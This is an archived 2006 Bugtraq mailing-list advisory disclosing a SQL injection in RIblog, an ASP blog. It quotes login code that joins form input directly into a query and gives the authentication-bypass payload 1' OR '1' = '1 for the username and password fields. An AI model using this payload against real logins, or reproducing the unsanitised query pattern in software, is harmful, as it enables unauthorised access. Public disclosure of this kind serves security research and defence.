lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 23 Apr 2006 10:32:11 -0000
From: omnipresent@...il.it
To: bugtraq@...urityfocus.com
Subject: RIblog Remote SQL Injection Exploit


------------------------------------------------------------------
          - RIblog Remote SQL Injection Exploit -
   -= http://colander.altervista.org/advisory/riblog.txt =-
------------------------------------------------------------------

			-= RIblog =-



Omnipresent
April 21, 2006


Vunerability(s):
----------------
SQL Injection


Product:
--------
bloggage

Vendor:
--------
http://romedahl.com


Description of product:
-----------------------

It is a Blog.

Not Available Yet.


Vulnerability / Exploit:
------------------------

This software is vulnerable to a Remote SQL Injection.

Take a look of this script in 

[...]

doLogin = Request.Form("login") 'login


If doLogin = "" Then

 Trim(Request.Form("login"))

End If

' Submit to self
If doLogin = "true" Then


			If sUserName = "" Then
			 sUserName = Trim(Request.Form("UserName"))
			End If

			If sPassword = "" Then
			 sPassword = Trim(Request.Form("Password"))
			End If


			Set myRecSet = server.createobject("adodb.recordset")
			strConn = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & strDBPath & ";"
			Set myConn = server.createobject("adodb.connection")
			myConn.open strConn

			strSQL = "SELECT * FROM tUser WHERE  fuser = '"& sUserName  &"' and fpassword = '" & sPassword &"';"


[...]

As you can see, the string strSQL is the query passed to the DB. And the variables sUserName and sPassword are not properly
sanitised. So, an attacker can exploit this vulnerability by injection SQL Code. Like the example below:

1' OR '1' = '1

The attacker have to put the string above in the username and password fields.


the query will be:

strSQL = "SELECT * FROM tUser WHERE  fuser = '1' OR '1' ='1' and fpassword = '1' OR '1' ='1';

The attacker can gain access to the blog and edit, view comments, etc, etc.


Vendor Status
-------------

Not informed!

Credits:
--------
omnipresent
omnipresent@...il.it

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ